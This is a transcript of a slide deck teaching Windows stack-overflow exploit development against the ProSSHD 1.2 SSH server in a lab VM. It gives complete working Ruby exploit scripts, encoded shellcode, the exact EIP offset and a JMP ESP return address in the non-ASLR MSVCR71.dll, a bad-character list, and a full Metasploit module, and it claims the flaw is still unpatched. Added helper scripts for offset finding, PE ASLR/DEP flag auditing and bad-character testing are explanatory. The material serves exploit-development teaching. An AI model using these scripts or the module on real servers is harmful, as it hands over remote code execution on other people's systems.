2011-03 Developing Windows Exploits
Real Windows Exploits, by Allen Harper, N2NetSecurity, Inc.
Raleigh ISSA
Nov 06, 2014
Transcript
Page 1: 2011-03 Developing Windows Exploits

Real Windows Exploits
Allen Harper

Page 2: ProSSHD Vulnerability

Binary can be found at: http://www.exploit-db.com/application/11618
STILL NOT FIXED... 0-days still work...

Page 3: Install ProSSHD in VMware

•  Set up a Windows 7 VMware client in host-only mode.
•  Determine the VMware client's IP.
•  Ping the VMware client from the host system.
•  Install the demo ProSSHD inside the VM and run it.

Page 4: Exploit Development Process

•  Crash Program in Debugger
•  Control EIP (next instruction)
•  Determine Offset of Overwrite to EIP
•  Determine Opcode to return to (new EIP)
•  Determine Space Constraints
•  Select and Test Shellcode
•  Build Exploit Sandwich
•  Determine Bad Characters

Page 5: Immunity Debugger

•  Fork from OllyDbg
•  Still looks and feels like OllyDbg
•  Adds a Python command shell
•  Allows for more automation
•  pvefindaddr is a great plugin tool for exploit development! http://corelan.be
•  Note: there was a problem with 1.74
•  Current version is 1.80

Page 6: Save Snapshot, Attach Debugger

•  In VMware, save a snapshot (prior to sending)
•  Send exploit, with Sleep(15) before send
•  File->Attach->wsshd.exe (may need to sort)
•  In debugger, hit F9 to continue the process

Page 7: Crash the ProSSHD Server

•  From host, crash remote server, control EIP

```ruby
# prosshd1.rb
%w{rubygems net/ssh net/scp}.each { |x| require x }
username = 'test1' # need to set this up on the test victim (OS account)
password = 'test1' # need to set this up on the test victim machine
host = '10.10.10.143'
port = 22
# use A's to overwrite EIP
get_request = "\x41" * 516
# let's do it...
Net::SSH.start(host, username, :password => password) do |ssh|
  sleep(15) # gives us time to attach to wsshd.exe
  ssh.scp.download!(get_request, "foo.txt") # 2 params: remote, local file
end
```

•  Run exploit with "ruby prosshd1.rb"
•  Attach debugger to wsshd.exe; after it loads, hit F9 twice

Page 8: Determine the Offset(s)

•  Revert VM, then use pattern_create

```ruby
# prosshd2.rb
%w{rubygems net/ssh net/scp}.each { |x| require x }
username = 'test1' # need to set this up on the test victim (OS account)
password = 'test1' # need to set this up on the test victim machine
host = '10.10.10.143'
port = 22
# use a cyclic pattern (pattern_create) to overwrite EIP
get_request = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq"
# let's do it...
Net::SSH.start(host, username, :password => password) do |ssh|
  sleep(15) # gives us time to attach to wsshd.exe
  ssh.scp.download!(get_request, "foo.txt") # 2 params: remote, local file
end
```

Run exploit with "ruby prosshd2.rb"

Page 9: Determine the Offset(s)

•  Attach debugger to wsshd.exe
•  After it loads, hit F9 twice

Page 10: Determine the Offset(s)
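The pattern in prosshd2.rb is Metasploit's pattern_create output, and the offset is recovered by locating the four bytes that landed in EIP inside it. The Ruby below is an added example, not code from the slides: it generates the same pattern and maps a crash value back to its offset; the EIP value 0x41347141 used in the usage block is constructed from the 492-byte offset the deck uses later, not a value shown on the slides.

```ruby
# Metasploit-style cyclic pattern: triplets of upper, lower, digit
# (Aa0Aa1 ... Az9Ba0 ...); every 4-byte window is unique for up to 20280 bytes.
def cyclic_pattern(length)
  out = +''
  ('A'..'Z').each do |u|
    ('a'..'z').each do |l|
      ('0'..'9').each do |d|
        out << u << l << d
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length] # caller asked for more than one full cycle provides
end

# Resolve the value found in a register (or stack slot) to its offset in the
# pattern. An Integer is the value as the debugger shows it: the CPU loaded it
# little-endian, so pack('V') restores the byte order seen in the buffer. A
# String is taken as the raw bytes seen in a memory dump.
# Returns nil when the value is not in the pattern, i.e. the register was not
# (or only partially) overwritten from this buffer.
def pattern_offset(pattern, value)
  needle = value.is_a?(Integer) ? [value].pack('V') : value.b
  pattern.b.index(needle)
end

# Resolve several crash-time values at once, e.g. EIP's value and the bytes
# ESP points at; each maps to its offset or nil.
def register_offsets(pattern, regs)
  regs.transform_values { |v| pattern_offset(pattern, v) }
end

if __FILE__ == $0
  pat = cyclic_pattern(500) # same length as the deck's prosshd2.rb pattern
  p register_offsets(pat, eip: 0x41347141, esp: 'Aq5A') # constructed values
end
```

A nil for EIP together with a hit for ESP means the return address came from somewhere other than the buffer you sent, which is the case to rule out before trusting the offset.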

Page 11: Determine Op-Codes to Return to

•  Determine the control vector; we could use:
   – JMP ESP
   – RETN
•  We choose JMP ESP
•  Could use msfpescan on ntdll.dll

Page 12: Determine Op-Codes to Return to

•  Problem: Vista and beyond protect NTDLL.DLL with ASLR
•  Need to find a non-ASLR module
•  This is the best way to "bypass" ASLR
•  pvefindaddr is the tool of choice
•  Run with "!pvefindaddr j -r esp -n" in ImmDbg
•  Results in file j.txt:
   C:\Users\[your name here]\AppData\Local\VirtualStore\Program Files\Immunity Inc\Immunity Debugger

Page 13: Determine Op-Code Address

```text
==================================================================
!pvefindaddr v1.32 corelanc0d3r - http://www.corelan.be:8800
-----Loaded modules ----------------------------------------------
Fixup | Base       | Top        | Size       | SafeSEH | ASLR | NXCompat | Modulename & Path
----------------------------------------------------------------
NO    | 0x7C340000 | 0x7C396000 | 0x00056000 | yes     | NO   | NO       | MSVCR71.dll : C:\Users\Public\Program Files\Lab-NC\ProSSHD\MSVCR71.dll
yes   | 0x76210000 | 0x762E4000 | 0x000D4000 | yes     | yes  | yes      | kernel32.dll : C:\Windows\system32\kernel32.dll
yes   | 0x77A50000 | 0x77B8C000 | 0x0013C000 | yes     | yes  | yes      | ntdll.dll : C:\Windows\SYSTEM32\ntdll.dll
<truncated for brevity>
NO    | 0x00400000 | 0x00457000 | 0x00057000 | yes     | NO   | NO       | wsshd.exe : C:\Users\Public\Program Files\Lab-NC\ProSSHD\wsshd.exe
<truncated for brevity>
Found push esp - ret at 0x7C345C30 [msvcr71.dll] - [Ascii printable] {PAGE_EXECUTE_READ} [SafeSEH: Yes - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Users\Public\Program Files\Lab-NC\ProSSHD\MSVCR71.dll
<truncated for brevity>
```
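The ASLR and NXCompat columns above come from two bits in each module's PE optional header (DllCharacteristics, set by /DYNAMICBASE and /NXCOMPAT); a module like MSVCR71.dll that lacks them is what makes the fixed 0x7C345C30 address usable, and page 16's note that wsshd.exe is not linked with /NXCOMPAT is the same flag. The Ruby below is an added example, not part of the deck or of pvefindaddr: it reads those bits straight from a PE image so a defender can audit shipped binaries. `fake_pe` builds a constructed minimal PE32 header so the check runs offline; the flag values are the IMAGE_DLLCHARACTERISTICS_* constants from the PE/COFF specification.

```ruby
# DllCharacteristics bits from the PE/COFF spec (IMAGE_DLLCHARACTERISTICS_*).
DLL_CHARACTERISTICS = {
  0x0020 => 'HIGH_ENTROPY_VA',
  0x0040 => 'DYNAMIC_BASE', # linked with /DYNAMICBASE: eligible for ASLR
  0x0100 => 'NX_COMPAT',    # linked with /NXCOMPAT: opts into DEP
  0x0400 => 'NO_SEH',       # image contains no SEH handlers
}.freeze

# Read the flags straight from the headers of a PE image (the file's bytes).
def dll_characteristics(image)
  raise 'not an MZ image' unless image[0, 2] == 'MZ'
  pe = image[0x3C, 4].unpack1('V')                 # e_lfanew
  raise 'bad PE signature' unless image[pe, 4] == "PE\0\0"
  opt = pe + 4 + 20                                # after signature + COFF file header
  magic = image[opt, 2].unpack1('v')
  raise 'unknown optional header' unless [0x10b, 0x20b].include?(magic)
  flags = image[opt + 70, 2].unpack1('v')          # same offset for PE32 and PE32+
  DLL_CHARACTERISTICS.select { |bit, _| (flags & bit) != 0 }.values
end

# One row of the kind pvefindaddr prints: is this module at a fixed address
# (no ASLR) and does it opt into DEP?
def aslr_dep_report(name, image)
  c = dll_characteristics(image)
  { name: name, aslr: c.include?('DYNAMIC_BASE'), nx: c.include?('NX_COMPAT') }
end

# Constructed minimal PE32 header (no sections) so the check runs offline;
# real input is File.binread('some.dll').
def fake_pe(dll_chars)
  img = "\0".b * 0x100
  img[0, 2] = 'MZ'
  img[0x3C, 4] = [0x40].pack('V')                  # e_lfanew -> 0x40
  img[0x40, 4] = "PE\0\0"
  img[0x44, 20] = [0x14c, 0, 0, 0, 0, 0xE0, 0x2102].pack('vvVVVvv') # i386 COFF header
  img[0x58, 2] = [0x10b].pack('v')                 # PE32 magic
  img[0x58 + 70, 2] = [dll_chars].pack('v')
  img
end

if __FILE__ == $0
  p aslr_dep_report('no flags, like MSVCR71.dll on the slides', fake_pe(0))
  p aslr_dep_report('DYNAMIC_BASE|NX_COMPAT, like ntdll.dll', fake_pe(0x0140))
end
```

The SafeSEH column is not covered here: it needs the load config directory rather than a header bit. Any module that reports aslr: false in a process is the one to relink with /DYNAMICBASE (or replace, for an old CRT such as MSVCR71.dll), since one such module defeats ASLR for the whole process.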

Page 14: Find Space Constraints

•  Crash with 2000 A's, calculate depth of buffer

```ruby
# prosshd3.rb
# ...truncated for brevity...
get_request = "\x41" * 492 + "\x42\x42\x42\x42" + "\x41" * 2000
```

•  Run, attach, crash, inspect stack for buffer size:
   0x0012f758 - 0x0012ef88 = 2000
   So we can fit 2000 bytes of shellcode into the buffer!

Page 15: Select and Test Shellcode

•  Generate your shellcode (switching to C)

```sh
$ msfpayload windows/exec cmd=calc.exe R | msfencode -b '\x00\x0a' -e x86/shikata_ga_nai -t c > sc.txt
```

•  Take that shellcode and copy-paste it into the following harness

```c
// shellcode.c
char shellcode[] = // copy paste from above
    "\x31\xc0\x31\... your shellcode goes here";

int main() {                 // main function
    int *ret;                // ret pointer for saved ret
    ret = (int *)&ret + 2;   // set ret to point to the saved return
    (*ret) = (int)shellcode; // change the saved ret to addr of shellcode
}
```

Page 16: Select and Test Shellcode

Notice: we disabled DEP (/NXCOMPAT)... does not matter here as our vulnerable program is not linked with /NXCOMPAT by default.

Page 17: Build Exploit Sandwich

```ruby
# prosshd4.rb
%w{rubygems net/ssh net/scp}.each { |x| require x }
username = 'test1'
password = 'test1'
host = '10.10.10.143'
port = 22
shell =
# [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)
"\xd9\xcc\x31\xc9\xb1\x33\xd9\x74\x24\xf4\x5b\xba\x99\xe4\x93" +
"\x62\x31\x53\x18\x03\x53\x18\x83\xc3\x9d\x06\x66\x9e\x75\x4f" +
"\x89\x5f\x85\x30\x03\xba\xb4\x62\x77\xce\xe4\xb2\xf3\x82\x04" +
"\x38\x51\x37\x9f\x4c\x7e\x38\x28\xfa\x58\x77\xa9\xca\x64\xdb" +
"\x69\x4c\x19\x26\xbd\xae\x20\xe9\xb0\xaf\x65\x14\x3a\xfd\x3e" +
"\x52\xe8\x12\x4a\x26\x30\x12\x9c\x2c\x08\x6c\x99\xf3\xfc\xc6" +
"\xa0\x23\xac\x5d\xea\xdb\xc7\x3a\xcb\xda\x04\x59\x37\x94\x21" +
"\xaa\xc3\x27\xe3\xe2\x2c\x16\xcb\xa9\x12\x96\xc6\xb0\x53\x11" +
"\x38\xc7\xaf\x61\xc5\xd0\x6b\x1b\x11\x54\x6e\xbb\xd2\xce\x4a" +
"\x3d\x37\x88\x19\x31\xfc\xde\x46\x56\x03\x32\xfd\x62\x88\xb5" +
"\xd2\xe2\xca\x91\xf6\xaf\x89\xb8\xaf\x15\x7c\xc4\xb0\xf2\x21" +
"\x60\xba\x11\x36\x12\xe1\x7f\xc9\x96\x9f\x39\xc9\xa8\x9f\x69" +
"\xa1\x99\x14\xe6\xb6\x25\xff\x42\x48\x6c\xa2\xe3\xc0\x29\x36" +
"\xb6\x8d\xc9\xec\xf5\xab\x49\x05\x86\x48\x51\x6c\x83\x15\xd5" +
"\x9c\xf9\x06\xb0\xa2\xae\x27\x91\xc0\x31\xbb\x79\x29\xd7\x3b" +
"\x1b\x35\x1d";
# Overwrite EIP with "jmp esp" (0x7c345c30) of msvcr71.dll
get_request = "\x41" * 492 + "\x30\x5C\x34\x7C" + "\x90" * 1000 + "\xcc" + shell
# let's do it...
Net::SSH.start(host, username, :password => password) do |ssh|
  sleep(15) # gives us time to attach to wsshd.exe
  ssh.scp.download!(get_request, "foo.txt") # 2 params: remote file, local file
end
```

Page 18: Test Exploit with Debugger

•  Run with "ruby prosshd4.rb"
•  Hit F9 twice to hit the breakpoint
•  Hit F9 to continue; if it crashes, there is a bad character.

Page 19: Find Bad Characters

•  Revert VM, resend exploit, step through
•  Tip 1: right click on halted instruction, follow in dump...

Shellcode is mangled... why? Bad char \x0a

Page 20: Build New Shellcode

```sh
# msfpayload windows/exec cmd=calc.exe R | msfencode -b '\x00\x0a\x20' -e x86/shikata_ga_nai -t ruby
# [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)
```

```ruby
shell =
"\x33\xc9\xb1\x33\xbd\xe3\x34\x37\xfb\xdb\xc6\xd9\x74\x24" +
"\xf4\x5f\x31\x6f\x0f\x83\xef\xfc\x03\x6f\xe8\xd6\xc2\x07" +
"\x06\x9f\x2d\xf8\xd6\xc0\xa4\x1d\xe7\xd2\xd3\x56\x55\xe3" +
"\x90\x3b\x55\x88\xf5\xaf\xee\xfc\xd1\xc0\x47\x4a\x04\xee" +
"\x58\x7a\x88\xbc\x9a\x1c\x74\xbf\xce\xfe\x45\x70\x03\xfe" +
"\x82\x6d\xeb\x52\x5a\xf9\x59\x43\xef\xbf\x61\x62\x3f\xb4" +
"\xd9\x1c\x3a\x0b\xad\x96\x45\x5c\x1d\xac\x0e\x44\x16\xea" +
"\xae\x75\xfb\xe8\x93\x3c\x70\xda\x60\xbf\x50\x12\x88\xf1" +
"\x9c\xf9\xb7\x3d\x11\x03\xff\xfa\xc9\x76\x0b\xf9\x74\x81" +
"\xc8\x83\xa2\x04\xcd\x24\x21\xbe\x35\xd4\xe6\x59\xbd\xda" +
"\x43\x2d\x99\xfe\x52\xe2\x91\xfb\xdf\x05\x76\x8a\x9b\x21" +
"\x52\xd6\x78\x4b\xc3\xb2\x2f\x74\x13\x1a\x90\xd0\x5f\x89" +
"\xc5\x63\x02\xc4\x18\xe1\x38\xa1\x1a\xf9\x42\x82\x72\xc8" +
"\xc9\x4d\x05\xd5\x1b\x2a\xf9\x9f\x06\x1b\x91\x79\xd3\x19" +
"\xfc\x79\x09\x5d\xf8\xf9\xb8\x1e\xff\xe2\xc8\x1b\x44\xa5" +
"\x21\x56\xd5\x40\x46\xc5\xd6\x40\x25\x88\x44\x08\x84\x2f" +
"\xec\xab\xd8\xa5"
```

Good list of bad chars: 00 0a 09 20 21
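Pages 19 and 20 find bad characters by following the shellcode in the dump, spotting where it diverges from what was sent, and excluding that byte from the next msfencode run until the bytes survive intact. The Ruby below is an added example, not the deck's code: it generates the probe string, compares it with the bytes read back, and repeats until nothing is mangled. `simulated_dump` is a constructed stand-in for the send, crash and follow-in-dump step, built to drop exactly the bytes this deck ended up excluding (09 0a 20 21, with 00 excluded up front).

```ruby
# All byte values not already known bad; \x00 is always excluded since it
# terminates C strings before the buffer is even copied.
def badchar_probe(known_bad = [0x00])
  (0x01..0xff).reject { |b| known_bad.include?(b) }.pack('C*')
end

# Compare what was sent with the bytes read back from the dump. Returns the
# first sent byte whose copy in memory differs, or at which the dump stops
# short (a truncated copy is the common symptom), or nil if the probe survived.
def first_bad_char(sent, observed)
  sent.bytes.each_with_index do |b, i|
    return b if observed.getbyte(i) != b
  end
  nil
end

# Iterate: each round excludes the byte found and re-sends a shorter probe,
# because one bad byte hides every byte that follows it in the dump.
# send_and_dump receives the probe and returns the bytes seen in memory.
def find_bad_chars(known_bad = [0x00], &send_and_dump)
  bad = known_bad.dup
  loop do
    probe = badchar_probe(bad)
    culprit = first_bad_char(probe, send_and_dump.call(probe))
    return bad.sort if culprit.nil?
    bad << culprit
  end
end

# Constructed stand-in for the debugger round trip: a transport that cuts the
# request at the first tab, LF, space or '!' (the bytes the deck found bad).
def simulated_dump(probe)
  cut = probe.bytes.index { |b| [0x09, 0x0a, 0x20, 0x21].include?(b) }
  cut ? probe[0...cut] : probe
end

if __FILE__ == $0
  p find_bad_chars { |probe| simulated_dump(probe) }.map { |b| format('%02x', b) }
end
```

On the real target the block inside find_bad_chars is the manual step (revert, resend, follow in dump); four rounds reproduce the deck's list 00 09 0a 20 21 exactly because each round can only expose the next bad byte.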

Page 21: Metasploit Decoders

•  Require space on the stack to decode
•  Modules use the StackAdjustment parameter
•  You may want to add 16 bytes of NOP to the beginning of the payload to be safe.

Page 22: Success!

•  Revert VM to running state
•  Launch exploit with new shellcode
•  Remove \xcc, replace with \x90, fire off exploit
•  P0wn3d!!!!! Where do you want to go today!

Page 23: Automating

•  Metasploit, as you have seen, is an excellent tool for both exploit development and execution.
•  You should look at existing modules; it is the best way to learn techniques.
•  There is no ProSSHD module :(
•  We will create one and automate our attack!

Page 24: Metasploit Module Sections

•  Header
•  Initialize section (bad chars, targets)
•  Exploit section (guts of sploit, protocol)

Page 25: Header

```ruby
##
# $Id: freesshd_key_exchange.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
%w{rubygems net/ssh net/scp}.each { |x| require x }

class Metasploit3 < Msf::Exploit::Remote

  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
```

Page 26: Initialize Section

```ruby
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ProSSHD 1.2.x SCP-GET Buffer Overflow',
      'Description'    => %q{
        This module exploits a simple stack buffer overflow in ProSSHD 1.2.
        This flaw is due to a buffer overflow error when handling a specially
        crafted scp get request from an SSH client.
        **Based on original Exploit by S2 Crew [Hungary]
      },
      'Author'         => 'AAH',
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 10000 $',
      'References'     => [],
      'DefaultOptions' => { 'EXITFUNC' => 'process', },
      'Payload'        => {
        'Space'           => 1000,
        'BadChars'        => "\x00\x09\x0a\x20\x21",
        'StackAdjustment' => -3500,
      },
      'Platform'       => 'win',
      'Targets'        => [ [ 'Windows 7', { 'Ret' => 0x7c345c30 } ], ],
      'Privileged'     => true,
      'DisclosureDate' => 'March 3, 2010',
      'DefaultTarget'  => 0))
    register_options([
      OptString.new('USERNAME', [ true, 'The username to authenticate as' ]),
      OptString.new('PASSWORD', [ true, 'The password for the specified username' ]),
      Opt::RPORT(22)
    ], self.class)
  end
```

Page 27: Exploit Section

```ruby
  def exploit
    get_request = "\x41" * 492 +
      [target.ret].pack('V') +
      "\x90" * 1000 +
      payload.encoded # shellcode 8)

    print_status("Trying to connect to #{datastore['RHOST']}...")

    # let's do it...
    Net::SSH.start(datastore['RHOST'], datastore['USERNAME'], :password => datastore['PASSWORD']) do |ssh|
      #sleep(15) # gives us time to attach to wsshd.exe
      print_status("Sending sploit to #{datastore['RHOST']}...")
      ssh.scp.download!(get_request, "foo.txt") # 2 params: remote file, local file
    end
    handler
  end

end
```

Page 28: Setup

•  Next, install the following rubygems
•  Have to run CygShell as Administrator (on older MSF)
•  Right click on it in the start menu, select "run as Administrator"

Page 29: Run it

•  Restart vulnerable server
•  Run Metasploit Console

Page 30: Armitage Demo